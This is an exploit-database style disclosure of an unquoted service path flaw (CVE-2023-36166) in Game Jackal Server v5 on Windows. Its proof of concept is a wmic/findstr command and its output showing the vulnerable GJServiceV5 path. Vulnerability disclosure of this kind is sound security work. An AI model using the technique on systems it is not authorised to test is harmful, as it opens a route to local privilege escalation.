Game jackal server v5 unquoted service path "gjservicev5" Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-07-11 |
Type : local |
Platform : windows
[+] Code ...
# Exploit Title: Game Jackal Server v5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.allradiosoft.ru
# Software Link: https://www.allradiosoft.ru/en/ss/index.htm
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36166
#PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i
auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Game Jackal Server v5
GJServiceV5 C:\Program Files
(x86)\SlySoft\Game Jackal v5\Server.exe Auto